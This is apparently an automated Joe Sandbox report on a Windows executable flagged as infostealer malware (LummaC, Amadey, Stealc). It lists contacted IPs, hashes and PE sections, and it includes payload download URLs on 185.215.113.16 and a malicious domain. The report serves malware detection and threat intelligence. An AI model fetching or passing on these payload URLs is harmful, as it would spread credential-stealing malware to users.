https://client-api.arkoselabs.com/v2/api.js	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Thraka	chromecache_130.5.dr	false		high
http://polymer.github.io/PATENTS.txt	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://aka.ms/certhelp	chromecache_110.5.dr, chromecache_122.5.dr	false		high
http://185.215.113.16/steam/random.exe	file.exe, file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361673958.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mairaw	chromecache_130.5.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://schema.org	chromecache_122.5.dr	false		high
http://polymer.github.io/LICENSE.txt	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	false		high
https://property-imper.sbs/	file.exe, file.exe, 00000000.00000003.2202757971.0000000001311000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2358730980.00000000012FC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/yourcaliforniaprivacychoices	chromecache_130.5.dr	false		high
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/nschonni	chromecache_130.5.dr	false		high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/adegeo	chromecache_130.5.dr	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/jonschlinkert/is-plain-object	chromecache_110.5.dr, chromecache_122.5.dr	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://octokit.github.io/rest.js/#throttling	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/js-cookie/js-cookie	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	file.exe, file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361673958.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schema.org/Organization	chromecache_130.5.dr	false		high
https://channel9.msdn.com/	chromecache_110.5.dr, chromecache_122.5.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/dotnet/try	chromecache_110.5.dr, chromecache_122.5.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.63	s-part-0035.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.33.116	property-imper.sbs	United States	13335	CLOUDFLARENETUS	false
172.217.21.36	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561644
Start date and time:	2024-11-24 03:03:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/70@9/6
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 172.217.21.35, 172.217.17.46, 23.218.210.69, 64.233.165.84, 2.20.41.214, 34.104.35.123, 20.189.173.16, 172.217.17.42, 172.217.17.74, 142.250.181.42, 142.250.181.10, 142.250.181.74, 172.217.19.234, 142.250.181.138, 172.217.19.170, 172.217.19.202, 23.32.238.130, 2.19.198.56, 13.74.129.1, 204.79.197.237, 13.107.21.237, 172.217.17.35, 172.217.17.78
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, clients2.google.com, go.microsoft.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, onedscolprdwus17.westus.cloudapp.azure.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, clients.l.google.com, c1.microsoft.com, wcp
Execution Graph export aborted for target file.exe, PID 2608 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:04:08	API Interceptor	47x Sleep call for process: file.exe modified

LLM Input / Output

Input	Output
URL: https://microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "Yes", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://learn.microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://learn.microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Register now", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The URL 'learn.microsoft.com' is a subdomain of 'microsoft.com', which is the legitimate domain for Microsoft.", "Microsoft is a well-known brand with a strong online presence.", "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.", "The subdomain 'learn' is commonly used by Microsoft for educational and documentation purposes." ], "riskscore": 1}
URL: learn.microsoft.com Brands: Microsoft Input Fields: u, n, k, n, o, w, n

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.246.63	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	CZxDiTktSY.exe	Get hash	malicious	XWorm	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	http://elizgallery.com/js.php	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
239.255.255.250	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	https://lifetraces.org/spo/priv/auth/login.php	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Cryptbot	Browse
	2fQ8fpTWAP.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
185.215.113.16	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	2fQ8fpTWAP.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
property-imper.sbs	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	2fQ8fpTWAP.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.33.116
s-part-0035.t-0009.t-msedge.net	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.63
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.63
	CZxDiTktSY.exe	Get hash	malicious	XWorm	Browse	13.107.246.63
	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	104.29.231.51
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	313e4225be01a2f968dd52e4e8c0b9fd08c906289779b.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
MICROSOFT-CORP-MSN-AS-BLOCKUS	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	40.108.225.161
	m68k.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	21.153.96.182
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	21.49.128.30
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	20.58.131.47
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	20.30.15.113
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	20.162.38.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.75.60.91
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	https://clearview-ps.inwise.net/Page_11-21-2024_1	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	23.1.237.91
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	4.175.87.197 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	4.175.87.197 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	4.175.87.197 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	4.175.87.197 13.107.246.63 23.218.208.109
	https://lifetraces.org/spo/priv/auth/login.php	Get hash	malicious	Unknown	Browse	4.175.87.197 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	4.175.87.197 13.107.246.63 23.218.208.109
	file.exe	Get hash	malicious	Cryptbot	Browse	4.175.87.197 13.107.246.63 23.218.208.109
	2fQ8fpTWAP.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	4.175.87.197 13.107.246.63 23.218.208.109
	EsgeCzT4do.exe	Get hash	malicious	XWorm	Browse	4.175.87.197 13.107.246.63 23.218.208.109
	CZxDiTktSY.exe	Get hash	malicious	XWorm	Browse	4.175.87.197 13.107.246.63 23.218.208.109
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	Cryptbot	Browse	104.21.33.116
	2fQ8fpTWAP.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Nov 24 01:04:42 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9737669616934057
Encrypted:	false
SSDEEP:	48:8GodhQTB0yDbaHqidAKZdA19ehwiZUklqehay+3:8uHfZy
MD5:	4821565954B6E18119E0DAC8D507A739
SHA1:	5C546E344EA136C130246EE3AEFC1EAFE435990E
SHA-256:	64FBB19C016A23673586B116A7CF8A871DBF0108CCF0EFBDB983E84803E7E293
SHA-512:	FD0144E3DF0F9B9EF3836FB103596E8143114B5D8BC76EE9FD510F76A7F51A5A81B3ABC2982F09B87C6BB43FC7FF8BAC7DCE1A3FAB6BE0B9FD6611B3A3BAA35C
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....a3:.>..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IxY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VxY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VxY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VxY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VxY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........7..S.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949290664664254
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'836'032 bytes
MD5:	88a2e1dc5f57311dc42a7d57dc7d9827
SHA1:	a26e33ea17b7d5ca3272e8a7521f141c927d1b75
SHA256:	c2c829ba69f689fe392435d8b886c002e050d3bb4cc6ec8f62317ceaa7ba02da
SHA512:	b4b2cdc31ced54f377e97f4b548dc128c6c7d1ee9888b6f2a5245b421f9673c9582c9a0a5981e7f70cfa1251e97672a9bec3a71b3d2bf7e7f09438a37ac69ae3
SSDEEP:	49152:uPF7j7Uh+8gidJ604qf+/a3Jv9ahTpNYtVYyw:kj7w7605fMa3JQh4Vfw
TLSH:	7185331A3A90D94BFF292B34003664A83B3ED7F362C4171B3942DD66CF3696570BA875
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g............................. I...........@..........................PI...........@.................................\...p..

Entrypoint:	0x892000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5805c	0x70	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x57000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x581f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x56000	0x26200	172cddc7c2b0ee7cccc20946b5074caf	False	0.9992827868852459	data	7.981874278944832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x57000	0x2b0	0x200	18e74e38c0786cc45fafa9f25c228ac2	False	0.794921875	data	6.086543254795664	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x58000	0x1000	0x200	c92ced077364b300efd06b14c70a61dc	False	0.15625	data	1.1194718105633323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x59000	0x2a1000	0x200	2b10b4ff642328ece1d45ca06d37f4a1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bfltexda	0x2fa000	0x197000	0x196600	29595ad956c30e19fac0dcd1ebc88d89	False	0.9942121174254076	data	7.954899185569	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eysgebwh	0x491000	0x1000	0x400	fa5a7364574ad69116a5f756f8c2abcc	False	0.7529296875	data	6.009808528365732	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
